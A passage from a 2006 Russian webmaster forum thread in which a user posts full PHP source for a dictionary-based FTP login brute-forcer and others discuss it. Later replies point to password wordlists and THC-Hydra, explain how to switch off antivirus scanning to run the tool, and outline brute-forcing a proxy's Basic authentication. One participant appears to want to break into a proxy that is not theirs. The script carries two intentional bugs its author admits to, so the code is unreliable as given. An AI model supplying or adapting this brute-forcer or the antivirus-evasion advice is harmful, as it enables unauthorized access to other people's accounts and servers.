 |
Форум вебмастеров на AlfaSpace.NET / The Matrix Has You / Код простейшего ftp-bruteforce'a на PHP :) |
| . 1 . 2 . >> |
| Автор | Сообщение |
| Константин TorrentMaster 3449 |
# Дата: 11 Авг 2006 16:38 ° Поправил: Константин Вот собственно и он сам - написан где-то за полтора часа, так что ногами не пинать  Умеет проверять связку ftp логин-пароль по словарю + для каждого логина проверяет также связки логин-логин и логин-перевернутый логин. Выводит статистику в процессе работы. Результаты сохраняет в текстовый файл.
<?
//simple FTP-bruteforce\\
//[config]\\
$timelimit=666;
$address= "66.66.66.66";
$port=21;
$logins="logins.txt";
$passwords="passwords.txt";
$result="result.txt";
function connector($addr,$prt,$log,$pas)
{
$conn_id = ftp_connect($addr,$prt);
if (!$conn_id)
{
return -1;//connection failed
}
else
{
if(@ftp_login ($conn_id,$log,$pass))
{
ftp_close($conn_id);
global $result;
$fl=fopen($result,"a");
fwrite($fl,"[$addr:$prt][$log][$pas]\n");
fclose($fl);
return 1;//success
}
else
{
ftp_close($conn_id);
return 0;//auth failed
}
}
}
//[main]\\
echo"<html><body bgcolor=\"Silver\"><center>simple FTP-bruteforce (by Deflector)
</center><hr>";
echo"Server: $address:$port<br>";
$fl=fopen($result,"w");
fclose($fl);
set_time_limit($timelimit);
$sttime=time();
$loginlist=file_get_contents($logins);
$loginliste=explode("\n",$loginlist);
unset($loginlist);
$passwordlist=file_get_contents($passwords);
$passwordliste=explode("\n",$passwordlist);
unset($passwordlist);
$loginlistl=sizeof($loginliste);
$passwordlistl=sizeof($passwordliste);
echo"Users in $logins: $loginlistl<br>";
echo"Passwords in $passwords: $passwordlistl<hr>";
$globalcount=0;
for ($lcount=0;$lcount<$loginlistl;$lcount++)
{
set_time_limit($timelimit);
$rs=connector($address,$port,trim($loginliste[$lcount]),trim($loginliste[$lc
ount]));
if ($rs>0)
{//success
$globalcount++;
echo"current: l=[$lcount]/[$loginlistl] p=[-2]/[] s=$globalcount t=".(in
tval(time()-$sttime))."<br>";flush();
continue;
}
elseif ($rs<0)
{
sleep(1);
$lcount--;
continue;
}
$rs=connector($address,$port,trim($loginliste[$lcount]),strrev(trim($loginli
ste[$lcount])));
if ($rs>0)
{//success
$globalcount++;
echo"current: l=[$lcount]/[$loginlistl] p=[-1]/[] s=$globalcount t=".(in
tval(time()-$sttime))."<br>";flush();
continue;
}
elseif ($rs<0)
{
sleep(1);
$lcount--;
continue;
}
for ($pcount=0;$pcount<$passwordlistl;$pcount++)
{
set_time_limit($timelimit);
$rs=connector($adress,$port,trim($loginliste[$lcount]),trim($passwordli
ste[$pcount]));
if ($rs>0)
{//success
$globalcount++;
echo"current: l=[$lcount]/[$loginlistl] p=[$pcount]/[$passwordlistl]
s=$globalcount t=".(intval(time()-$sttime))."<br>";flush();
break;
}
elseif ($rs<0)
{
sleep(1);
$pcount--;
continue;
}
if (rand(1,100)>97)
{
echo"current: l=[$lcount]/[$loginlistl] p=[$pcount]/[$passwordlistl]
s=$globalcount t=".(intval(time()-$sttime))."<br>";flush();
}
}
}
echo"<hr>";
echo"Process completed: <a href=\"$result\">Result[$globalcount]</a> t=".(intval
(time()-$sttime));flush();
?>
З.Ы. в коде допущены 2 ошибки - чтобы скрипт-киддисы не пользовались |
| Connected Pluged&Played  589 |
# Дата: 11 Авг 2006 17:11 И на сколько быстро он работает? |
| Константин TorrentMaster 3449 |
# Дата: 11 Авг 2006 17:21 ° Поправил: Константин Connected Тест проводился на связке lx-host-alfaspace. Я взламывал пароль к своему аккаунту на альфаспейсе, запуская скрипт на lx-host'е. Результат - проверяет примерно по 1 паролю за 0.75 секунды при одном потоке. Если запускать в 10 потоков - то примерно за 0.9 секунды - по 1 паролю на поток. Если брутить пароли к тому же хосту, где он запущен, то очевидно скорость будет на порядки больше. Правда преимущества многопоточности не будут ощущаться. |
| Jizus CREED Участник  686 |
# Дата: 11 Авг 2006 17:42 Константин Обьясни, плз, а на фих ты его выложил?))) Мы и так не сомневаемся в твоей квалицикации) |
| Константин TorrentMaster 3449 |
# Дата: 11 Авг 2006 17:47 Jizus CREED Я выложил "исключительно в ознакомительных целях"
+ мало ли кому пригодится - я же написал. Квалификация тут не причем - код не оптимизирован надлежащим образом между прочим. К тому же это повысит популярность форума альфы среди определенного круга лиц |
| Jizus CREED Участник 686 |
# Дата: 11 Авг 2006 17:55 » Константин К тому же это повысит популярность форума альфы среди определенного круга лицА, ну тады да))) |
| Roler USA Hater  1281 |
# Дата: 12 Авг 2006 01:06 Константин Ничё, доработаем  |
| Андрей Алексеевич  2125 |
# Дата: 12 Авг 2006 01:46 А для ftp_connect не нужно запускать php с особыми параметрами? Просто два мануала говорят по-разному.  |
| Константин TorrentMaster 3449 |
# Дата: 14 Авг 2006 04:42 Андрей Для запуска я фтп-коннектом пхп должен быть собран, а не запущен с особыми параметрами. Кстати - не следует пытаться выполнить скрипт на альфе - тут пхп собран без поддержки фтп_коннект. |
| Рамиль minibb moder  1151 |
# Дата: 16 Авг 2006 04:10 Константин А где можно взять нормальные словарики паролей? |
| persei Участник  475 |
# Дата: 16 Авг 2006 04:13 у меня есть но там 150 мб |
| Рамиль minibb moder 1151 |
# Дата: 16 Авг 2006 04:15 persei А поменьше ~5-10 МБ нет? З.Ы. Сколько ж там паролей? 1.000.000.000.000? |
| Константин TorrentMaster 3449 |
# Дата: 16 Авг 2006 06:22 passwords.ru - словари паролей на любой вкус |
| Константин TorrentMaster 3449 |
# Дата: 20 Авг 2006 05:47 Как только что выяснилось - я когда писал брутфорсер, откровенно страдай фигней - вместо того, чтобы заюзать гууууугл. Вот обнаружил универсальный брутфорсер всего, что только можно, написанный профессионалами, а главное очень быстрый http://thc.segfault.net/thc-hydra Кому надо - пользуйтесь |
| firstbattle Участник  134 |
# Дата: 24 Авг 2006 07:18 » Константин Вот обнаружил универсальный брутфорсер всего, что только можно, написанный профессионалами, а главное очень быстрыйЧето у меня страница не открывается =(((( |
| Roler USA Hater 1281 |
# Дата: 24 Авг 2006 09:13 Дык, это писали профи. Сайт надо ломануть))) |
| firstbattle Участник 134 |
# Дата: 24 Авг 2006 20:08 Ну так надо хотябы внизу маленькими буквами писать типо ламерам не лезть |
| Михаил Я знаю людей...  2551 |
# Дата: 24 Авг 2006 21:55 » firstbattle Ну так надо хотябы внизу маленькими буквами писать типо ламерам не лезть "...Ламерам не лезть..." А что он такой тяжелый? |
| firstbattle Участник 134 |
# Дата: 27 Авг 2006 16:07 » Михаил "...Ламерам не лезть..."Мне пофик, я через проксю скачал |
| persei Участник 475 |
# Дата: 29 Авг 2006 23:55 Константин о да, гидра это круто, но настоящую мощь она показывает только на ломаемом сервере. |
| Рамиль minibb moder 1151 |
# Дата: 30 Сен 2006 14:42 ° Поправил: Рамиль Константин НОД нашёл в hydra.exe какой-то вирус Сведения о тревоге файл: H:\hydra\hydra.exe Bиpуc: Win32/HackTool.Hydra.D приложение Koммeнтapий: был перемещен в карантин. Вы можете закрыть это окно. Что делать? Забить и попробовать с выключенным антивирем? |
| Константин TorrentMaster 3449 |
# Дата: 30 Сен 2006 14:54 это не вирус - он там саму гидру и нашел
отруби модуль AMON у нода - когда гидру юзаешь. И поставь ему дефолтным действием не перемещать в карантин, а перемещать в карантин только при подтверждении - а то иначе он у меня даже в текстовиках шеллы не давал хранить |
| Рамиль minibb moder 1151 |
# Дата: 1 Окт 2006 00:33 Константин Понятно. Походу придётся качать снова, НОД файл в архиве побил |
| Рамиль minibb moder 1151 |
# Дата: 4 Окт 2006 11:22 Константин Теперь есть вопрос - как ей пользоваться под Виндой? Вроде на скринах есть инферфейс, а у меня появляется досовоское окошоко и сразу пропадает. Конечно в ридми есть описание команд, но скроее всего они для линя? ЗЫ. Если вопрос действительно глуп, извинит меня! |
| Константин TorrentMaster 3449 |
# Дата: 4 Окт 2006 12:12 Под виндой не юзал
Так что не знаю ,чем виндозная версия отличается |
| Рамиль minibb moder 1151 |
# Дата: 7 Окт 2006 07:28 Константин Жалко. Под линем мне его не собрать/запустить |
| Рамиль minibb moder 1151 |
# Дата: 11 Окт 2006 07:32 Константин Кароче я понял. Интерфейс есть тока под линем. Под виндой его нет. Поэтому нада юзать коммандную строку Кароче, мне нужно забрутить такое окошечко, authentication on the proxy на хосте 192.168.0.1:8080 с логинами в login.txt и паролями в passwords.txt. Это гибра может? |
| Константин TorrentMaster 3449 |
# Дата: 11 Окт 2006 10:00 Рамиль Если тебе надо сбрутить именно проксю - тогда не может. Гидра предусматривает возможность брута ЧЕРЕЗ проксю - с заранее определенным логином и паролем |
| Рамиль minibb moder 1151 |
# Дата: 11 Окт 2006 10:32 ° Поправил: Рамиль Константин А не знаешь, что может? Просто очень нада, а в гугле находится скорее не брутер для прокси, а прокси для брутера...  |
| Константин TorrentMaster 3449 |
# Дата: 11 Окт 2006 11:32 ° Поправил: Константин Рамиль Нет не знаю - достаточно специфическая задача. Впрочем никто не мешает самому написать тулзу специально для этих целей. Алгоритм прост: коннект к проксе, запрос к примеру http://www.ya.ru/index.html обычным GET, только не забыть обязательное поле запроса: Auth...: Basic ххххх вместо хххх подставь base64 от "логин:пароль" |
| . 1 . 2 . >> |
![[Valid RSS]](valid-rss.png "Validate my RSS feed")